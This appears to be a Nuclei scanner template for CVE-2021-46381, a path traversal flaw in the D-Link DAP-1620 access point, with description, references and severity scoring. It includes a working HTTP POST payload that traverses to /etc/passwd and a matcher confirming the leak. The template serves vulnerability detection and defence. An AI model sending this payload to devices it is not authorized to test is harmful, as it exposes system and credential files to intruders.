2022-03-25 23:48:25 +00:00
id : CVE-2021-46381
info :
name : D-Link DAP-1620 - Local File Inclusion
author : 0x_Akoko
severity : high
2022-06-29 17:59:51 +00:00
description : D-Link DAP-1620 is susceptible to local file Inclusion due to path traversal that can lead to unauthorized internal files reading [/etc/passwd] and [/etc/shadow].
2023-09-27 15:51:13 +00:00
impact : |
An attacker can exploit this vulnerability to access sensitive information, such as configuration files or credentials, leading to further compromise of the device or network.
2023-09-06 12:09:01 +00:00
remediation : |
Apply the latest firmware update provided by D-Link to fix the local file inclusion vulnerability.
2022-03-29 06:39:40 +00:00
reference :
- https://drive.google.com/drive/folders/19OP09msw8l7CJ622nkvnvnt7EKun1eCG?usp=sharing
2022-05-17 09:18:12 +00:00
- https://www.dlink.com/en/security-bulletin/
2022-06-29 17:59:51 +00:00
- https://nvd.nist.gov/vuln/detail/CVE-2021-46381
2023-04-12 10:55:48 +00:00
- http://packetstormsecurity.com/files/167070/DLINK-DAP-1620-A1-1.01-Directory-Traversal.html
2024-03-23 09:28:19 +00:00
- https://github.com/SYRTI/POC_to_review
2022-03-25 23:48:25 +00:00
classification :
cvss-metrics : CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:N/A:N
cvss-score : 7.5
cve-id : CVE-2021-46381
cwe-id : CWE-22
2024-05-31 19:23:20 +00:00
epss-score : 0.02555
epss-percentile : 0.90197
cpe : cpe:2.3:h:dlink:dap-1620:-:*:*:*:*:*:*:*
2023-04-28 08:11:21 +00:00
metadata :
max-request : 1
2023-07-11 19:49:27 +00:00
vendor : dlink
2024-05-31 19:23:20 +00:00
product : dap-1620
2024-01-14 09:21:50 +00:00
tags : cve2021,cve,lfi,router,packetstorm,dlink
2022-03-25 23:48:25 +00:00
2023-04-27 04:28:59 +00:00
http :
2022-03-25 23:48:25 +00:00
- method : POST
path :
- "{{BaseURL}}/apply.cgi"
body : "action=do_graph_auth&graph_code=94102&html_response_message=just_login&html_response_page=../../../../../../../../../../../../../../etc/passwd&log_pass=DummyPass&login_n=admin&login_name=DummyName&tkn=634855349&tmp_log_pass=DummyPass&tmp_log_pass_auth=DummyPass"
matchers :
- type : regex
2022-03-29 06:39:40 +00:00
part : body
2022-03-25 23:48:25 +00:00
regex :
- "root:.*:0:0:"
2024-06-01 06:53:00 +00:00
# digest: 490a00463044022070b8dbc3e128ddf0c0fbc3c6d633deff1f27d7b47267e4434d27f076fd057d480220559981b9ea86820937b6c3f92be3767cd232c32a81a80845b72d11c336c14688:922c64590222798bb761d5b6d8e72950